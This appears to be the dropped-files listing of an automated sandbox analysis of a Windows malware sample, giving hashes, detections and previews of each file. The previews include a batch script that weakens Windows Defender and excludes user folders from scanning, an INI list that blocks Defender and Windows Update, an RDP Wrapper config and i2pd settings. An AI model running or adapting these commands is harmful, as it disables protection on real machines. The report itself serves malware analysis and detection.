                                                                                                                Preview:; RDP Wrapper Library configuration..; Do not modify without special knowledge..; Edited by sebaxakerhtc....[Main]..Updated=2024-08-21..LogFile=\rdpwrap.txt..SLPolicyHookNT60=1..SLPolicyHookNT61=1....[SLPolicy]..TerminalServices-RemoteConnectionManager-AllowRemoteConnections=1..TerminalServices-RemoteConnectionManager-AllowMultipleSessions=1..TerminalServices-RemoteConnectionManager-AllowAppServerMode=1..TerminalServices-RemoteConnectionManager-AllowMultimon=1..TerminalServices-RemoteConnectionManager-MaxUserSessions=0..TerminalServices-RemoteConnectionManager-ce0ad219-4670-4988-98fb-89b14c2f072b-MaxSessions=0..TerminalServices-RemoteConnectionManager-45344fe7-00e6-4ac6-9f01-d01fd4ffadfb-MaxSessions=2..TerminalServices-RDP-7-Advanced-Compression-Allowed=1..TerminalServices-RemoteConnectionManager-45344fe7-00e6-4ac6-9f01-d01fd4ffadfb-LocalOnly=0..TerminalServices-RemoteConnectionManager-8dc86f1d-9969-4379-91c1-06fe1dc60575-MaxSessions=1000..TerminalServices-DeviceRedirection-Licenses-TS
                                                                                                                Process:C:\Users\user\AppData\Local\Temp\73tsjpnle0jv48sgryqfs6ph8t.exe
                                                                                                                File Type:data
                                                                                                                Category:dropped
                                                                                                                Size (bytes):10451376
                                                                                                                Entropy (8bit):6.708065758846917
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:196608:diRu5DnWLX6Cs3E1CPwDvt3uF8c339CMEhB:diRsCKCsU1CPwDvt3uFd9CMEX
                                                                                                                MD5:312704A6232D74733DE04C6E00F8CF21
                                                                                                                SHA1:2B4820AC82C5B851464D6563FA6EA0CB3E3629C2
                                                                                                                SHA-256:8D11890F2B70BA2ABB4B017B05F3BB1D20ECA6AD3EB84F0251E0857C77682C9B
                                                                                                                SHA-512:5C32B9A8267C57CE640E7612BDECD7D7EC67F4E0AB48DD97A53373D220765AB234BC28779F524E788E1E03D8857CCD7755A22F19E1A34AE36FD6F33444016F01
                                                                                                                Malicious:false
                                                                                                                Preview:_W&T....cnccli.dll.MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...(............\........."h.............................P......7F....`... .........................................^....................................@..l...........................@...(.......................h............................text...(...........................`..`.data........0......................@....rdata..`d...@...f...(..............@..@.pdata..............................@..@.xdata..............................@..@.bss.....................................edata..^...........................@..@.idata..............................@....CRT....X.... ......................@....tls.........0......................@....reloc..l....@......................@..B.....................................................................................................................................................
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:data
                                                                                                                Category:modified
                                                                                                                Size (bytes):64
                                                                                                                Entropy (8bit):0.34726597513537405
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Nlll:Nll
                                                                                                                MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                Malicious:false
                                                                                                                Preview:@...e...........................................................
                                                                                                                Process:C:\Users\user\Desktop\file.exe
                                                                                                                File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):10639360
                                                                                                                Entropy (8bit):7.4147455331909855
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:196608:PE1LTxbO313norADHLHhHiVulZ/KHNV4G:PyxbOFC8b/KtV4
                                                                                                                MD5:7D1755E8E41A6C2F08D2FAEFFDF9DAD1
                                                                                                                SHA1:C04D89F1054F2EE34B548126A5ADD4EEE4751AE4
                                                                                                                SHA-256:44CF4321C138C4CACECC95DEBA735F508C96049E7F0E8F0538684DC4F0C1E9A5
                                                                                                                SHA-512:B099238838B0D8B258529126B3C279AC735FEFF778D52C3117EB3CD587267A145A09BC1317FB412B2C810EA8B2232A8218FE459E33AC99F9B48DECFDC62E4816
                                                                                                                Malicious:true
                                                                                                                Antivirus:
                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                • Antivirus: ReversingLabs, Detection: 42%
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................(.....T.................@...................................a.....`... ..............................................................@..d...........................................`/..(....................................................text...(...........................`..`.data.............................@....rdata...^......`.................@..@.pdata..d....@.......(..............@..@.xdata.......P.......2..............@..@.bss....p....`...........................idata...............<..............@....CRT....`............R..............@....tls.................T..............@....reloc...............V..............@..B................................................................................................................................................................................................................
                                                                                                                Process:C:\Users\user\Desktop\file.exe
                                                                                                                File Type:DOS batch file, ASCII text
                                                                                                                Category:dropped
                                                                                                                Size (bytes):259
                                                                                                                Entropy (8bit):4.933902901538645
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:6:hJKBnm61gV/eGgLSzomkNgBnm61gV/eGgVPgBnm61PeGgdEYJgrWy+5:unm0gViLUomqsnm0gViaBnm0SuQgrWt
                                                                                                                MD5:261A842203ADB67547C83DE132C7A076
                                                                                                                SHA1:6C1A1112D2797E2E66AA5238F00533CD4EB77B3D
                                                                                                                SHA-256:49ADF0FC74600629F12ADF366ECBACDFF87B24E7F2C8DEA532EA074690EF5F84
                                                                                                                SHA-512:7787C5F10EC18B8970F22B26F5BB82C4A299928EDB116A0B92FB000F2A141CCB4C8BCAB3AB91D5E3277ABDA8F2D6FE80434E4AEF5EE8A5CD3223CFB9989A6337
                                                                                                                Malicious:true
                                                                                                                Preview:@echo off..powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend".powershell.exe -NoLogo -Command "Set-MpPreference -MAPSReporting 0".powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath '%HOMEDRIVE%\Users\'"..exit 1
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):60
                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                Malicious:false
                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):60
                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                Malicious:false
                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):60
                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                Malicious:false
                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):60
                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                Malicious:false
                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):60
                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                Malicious:false
                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):60
                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                Malicious:false
                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):60
                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                Malicious:false
                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):60
                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                Malicious:false
                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):60
                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                Malicious:false
                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):60
                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                Malicious:false
                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):60
                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                Malicious:false
                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):60
                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                Malicious:false
                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                Process:C:\Users\user\Desktop\file.exe
                                                                                                                File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):98304
                                                                                                                Entropy (8bit):6.298274541598319
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:1536:EJm0mRQUtrg7DYy+F2aQuuvL7V0Y91n1ot:EJmjSUtMiF2suvVr11ot
                                                                                                                MD5:319865D78CC8DF6270E27521B8182BFF
                                                                                                                SHA1:716E70B00AA2D154367028DE896C7D76C9D24350
                                                                                                                SHA-256:A78945E7532ECDB29B9448A1F3EEF2F45EC2F01CA070B9868258CBCD31EAC23F
                                                                                                                SHA-512:78CD48C8BA558DFFC204A70DBFF13889984F80F268A715FEC7FC018A7718A11822975F775D44A927C5815AA2CCC0D78502264354BF5D8C0502B5A0A323948611
                                                                                                                Malicious:true
                                                                                                                Antivirus:
                                                                                                                • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................(.....|.................@....................................#7....`... ..............................................................................................................a..(....................... ............................text...............................`..`.data...............................@....rdata...R... ...T..................@..@.pdata...............R..............@..@.xdata...............\..............@..@.bss....0................................idata...............f..............@....CRT....`............z..............@....tls.................|..............@....reloc...............~..............@..B................................................................................................................................................................................................................
                                                                                                                Process:C:\Users\user\AppData\Local\Temp\73tsjpnle0jv48sgryqfs6ph8t.exe
                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):3741
                                                                                                                Entropy (8bit):5.4923187442938435
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:96:isYJ9VvDT0HU0Hn0H1OALeK0Hu0H+kQHR39P+X+o0HNVHuHP0HltHw:DiTbT000H0EALeK0O0TQxNPA+o0tVOvT
                                                                                                                MD5:02EE49AC3492CDAEA9C80E2B5AF5F32E
                                                                                                                SHA1:535DFC45AA4D2F362A36B4065E22D4BE68E9CE02
                                                                                                                SHA-256:67952B3F5705976E75A38B24DE2B9FA22A8A661896463BAE0E932B8F5E522A21
                                                                                                                SHA-512:0F1DF0F3B072D9CEE281105A2B94021BFFA0BBC0EADA115270AFA1734BB43A54761547CD578FE4D88C0F3D256BD4A32C91DE020D1BC95FA687094489A2150B1A
                                                                                                                Malicious:false
                                                                                                                Preview:[I] (debug_init) -> Log open success(flog_path=C:\Users\user\AppData\Local\Temp\installer.log)..[I] (debug_init) -> Done..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ffe22170000)..[D] (module_get_proc) -> Done(hnd=0x00007ffe22170000,name=RtlGetVersion,ret=0x00007ffe221ae520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=88d241f9)..[I] (sys_init) -> Done(sys_uid=c76a8f0888d241f9,sys_os_ver=10.0.19045.0.0)..[I] (net_init) -> Done..[I] (fs_path_expand) -> Done(path=%PUBLIC%,xpath=C:\Users\Public,xpath_sz=15)..[I] (fs_dir_create) -> Done(path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\,recursive=1)..[D] (fs_attr_get) -> Done(path=C:\Users\Public\Computer.{20d04fe0-3aea-10
                                                                                                                Process:C:\Users\user\AppData\Local\Temp\cwjk513wjc7a1mlgh3.exe
                                                                                                                File Type:Generic INItialization configuration [svc]
                                                                                                                Category:dropped
                                                                                                                Size (bytes):195
                                                                                                                Entropy (8bit):4.692426693515089
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:PCLtupyhdA5A1XJy31ae0CYUAM9t2X0DwL1Uy/5ookVqEfokH2VmM74osLSgRUYp:PItZLJ4aZC9b/EhUyBjZBkWESqj
                                                                                                                MD5:E025B58CB2D118FAFAE00850EE91C5F9
                                                                                                                SHA1:DD23CE328F593AF74455F2C2F805B662466A1205
                                                                                                                SHA-256:897FC59CEDFBCAFDB9D0BEFEE9FC21A1B4C61259992A40F1986921E406E36340
                                                                                                                SHA-512:5CD3F72CB1FF5754F3329A1EF1C7D45826BE48540AAD60FC55B91C7EFDCBBEF8B6BEB66ED7E2CF338348CE3C43DE2C8B2C0E72C681A8C314ADBAE0F844C7B7EF
                                                                                                                Malicious:false
                                                                                                                Preview:[app]..MsMpEng.exe=1..MsSense.exe=1..SenseIR.exe=1..SenseNdr.exe=1..SenseCncProxy.exe=1..SenseSampleUploader.exe=1..[svc]..wuauserv=1..DoSvc=1..UsoSvc=1..WaaSMedicSvc=1..[ip4]..54.243.255.141=1..
                                                                                                                Process:C:\Users\user\AppData\Local\Temp\cwjk513wjc7a1mlgh3.exe
                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):23117
                                                                                                                Entropy (8bit):5.172648034825642
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:384:ubbEbNQ6s69WS8vv88o888888888888j888888888888e88888888088888888AZ:ubbEbNQ6s69WS8vv88o888888888888g
                                                                                                                MD5:AC67E6A64AA8C32107191D464E0319CD
                                                                                                                SHA1:3708A88E715E55889153ADF85FD8A98B0CC6D3F2
                                                                                                                SHA-256:C4DA2A83B3232895465FD317F78FD8B41D7EF8C5486D364B3A7C1D9063398906
                                                                                                                SHA-512:A5E002B7EA5E4BD73FF4D6931C67CE51A359D1607E67952278D36A9C25E82FE5EC1607550C7CCDE291F24E9FD7DB66B4B86094187479DFA6AFCE4209A0A847E1
                                                                                                                Malicious:false
                                                                                                                Preview:[I] (debug_init) -> Log open success(flog_path=C:\Users\user\AppData\Local\Temp\wfpblk.log)..[I] (debug_init) -> Done..[I] (fs_file_write) -> Done(path=C:\Users\user\AppData\Local\Temp\wfpblk.ini,mode=wb,buf_sz=195)..[I] (fs_file_read) -> Done(path=C:\Users\user\AppData\Local\Temp\wfpblk.ini,buf_sz=195)..[I] (ini_load) -> Done(path=C:\Users\user\AppData\Local\Temp\wfpblk.ini)..[D] (ini_get_sec) -> Done(name=app)..[D] (ini_get_sec) -> Done(name=app)..[D] (ini_get_sec) -> Done(name=app)..[W] (ini_get_var) -> Failed(sec=app,name=[System Process],err=00000003)..[D] (ini_get_sec) -> Done(name=app)..[W] (ini_get_var) -> Failed(sec=app,name=System,err=00000003)..[D] (ini_get_sec) -> Done(name=app)..[W] (ini_get_var) -> Failed(sec=app,name=Registry,err=00000003)..[D] (ini_get_sec) -> Done(name=app)..[W] (ini_get_var) -> Failed(sec=app,name=smss.exe,err=00000003)..[D] (ini_get_sec) -> Done(name=app)..[W] (ini_get_var) -> Failed(sec=app,name=csrss.exe,err=00000003)..[D] (ini_get_sec) -> Done
                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                File Type:ASCII text
                                                                                                                Category:dropped
                                                                                                                Size (bytes):8568
                                                                                                                Entropy (8bit):4.958673415285098
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:96:e+I8WTr7LjdL33ZqPDNLWBsaBMG+xv9G86UJ5TMmyvmyLKkfUZleZnE/Ndm/7CIg:e+I8Mr7VtXl1zrrIqEVdm/7CItWR0SX
                                                                                                                MD5:27535CEE6740DFC50A78A0322415E67C
                                                                                                                SHA1:E80541CF15C8ED4C5EEDA8D8C24674A5B8A27F61
                                                                                                                SHA-256:FB0CDBF4E0215AE1866E97860C2AC3DD96E7498BFE2AF3D82378041CDFF7F292
                                                                                                                SHA-512:25F11A8262B5A2F59BD6C9D8673B5AD5A140EAE8C007244810B2924EB08B5CF54AE19E61BE5139319877278D11868BBD85BD2E6C67F5FAD4E2A458E2844EBC0C
                                                                                                                Malicious:false
                                                                                                                Preview:## Configuration file for a typical i2pd user.## See https://i2pd.readthedocs.io/en/latest/user-guide/configuration/.## for more options you can use in this file...## Lines that begin with "## " try to explain what's going on. Lines.## that begin with just "#" are disabled commands: you can enable them.## by removing the "#" symbol...## Tunnels config file.## Default: ~/.i2pd/tunnels.conf or /var/lib/i2pd/tunnels.conf.# tunconf = /var/lib/i2pd/tunnels.conf..## Tunnels config files path.## Use that path to store separated tunnels in different config files..## Default: ~/.i2pd/tunnels.d or /var/lib/i2pd/tunnels.d.# tunnelsdir = /var/lib/i2pd/tunnels.d..## Path to certificates used for verifying .su3, families.## Default: ~/.i2pd/certificates or /var/lib/i2pd/certificates.# certsdir = /var/lib/i2pd/certificates..## Where to write pidfile (default: /run/i2pd.pid, not used in Windows).# pidfile = /run/i2pd.pid..## Logging configuration section.## By default logs go to stdout with level 'inf
                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):9146880
                                                                                                                Entropy (8bit):6.674868432808522
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:196608:DiRu5DnWLX6Cs3E1CPwDvt3uF8c339CME:DiRsCKCsU1CPwDvt3uFd9CME
                                                                                                                MD5:676064A5CC4729E609539F9C9BD9D427
                                                                                                                SHA1:F77BA3D5B6610B345BFD4388956C853B99C9EB60
                                                                                                                SHA-256:77D203E985A0BC72B7A92618487389B3A731176FDFC947B1D2EAD92C8C0E766B
                                                                                                                SHA-512:4C876E9C1474E321C94EA81058B503D695F2B5C9DCA9182C515F1AE6DE065099832FD0337D011476C553958808C7D6F748566734DEEE6AF1E74B45A690181D02
                                                                                                                Malicious:true
                                                                                                                Antivirus:
                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......f..........."...).t]......R..0........................................P............`... .......................................z..t... ...,............p..?...........p...............................`m.(....................*...............................text...(r]......t].................`..`.data.........]......x].............@....rdata..`>...@^..@....^.............@..@.pdata...?....p..@...^p.............@..@.xdata...t....t..v....t.............@..@.bss....`Q...@z..........................edata...t....z..v....z.............@..@.idata...,... ......................@....CRT....`....P......................@....tls.........`......................@....reloc.......p......................@..B........................................................................................................................................................................
                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):37376
                                                                                                                Entropy (8bit):5.7181012847214445
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:768:2aS6Ir6sXJaE5I2IaK3knhQ0NknriB0dX5mkOpw:aDjDtKA0G0j5Opw
                                                                                                                MD5:E3E4492E2C871F65B5CEA8F1A14164E2
                                                                                                                SHA1:81D4AD81A92177C2116C5589609A9A08A5CCD0F2
                                                                                                                SHA-256:32FF81BE7818FA7140817FA0BC856975AE9FCB324A081D0E0560D7B5B87EFB30
                                                                                                                SHA-512:59DE035B230C9A4AD6A4EBF4BEFCD7798CCB38C7EDA9863BC651232DB22C7A4C2D5358D4D35551C2DD52F974A22EB160BAEE11F4751B9CA5BF4FB6334EC926C6
                                                                                                                Malicious:false
                                                                                                                Antivirus:
                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........qc..qc..qc......qc...`..qc...g..qc..qb..qc...b..qc...f..qc...c..qc...j..qc......qc...a..qc.Rich.qc.................PE..d...#............." .....Z...>.......]...............................................a....`A.........................................~..........@...............................\... x..T............................p...............q..P............................text....Y.......Z.................. ..`.rdata.......p.......^..............@..@.data...P............z..............@....pdata...............|..............@..@.rsrc...............................@..@.reloc..\...........................@..B........................................................................................................................................................................................................................................................
                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):91136
                                                                                                                Entropy (8bit):6.2290767543196575
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:1536:/PvW2FSiFAp7A1VBYj6PemyulDw02PijNFnRbPEMBI:/nW6SiFAp7A1VBYj6Pemyu1F2IFRbcM+
                                                                                                                MD5:4C086C8F48C4D0F8C20410E60340AEC9
                                                                                                                SHA1:77481360A98F3018F92A57B66E1DC7A6EC0DD0E8
                                                                                                                SHA-256:0A8FCB54DF736100F5792B6CE57AE165553712CB1E5701E4E0DD7620E6089F59
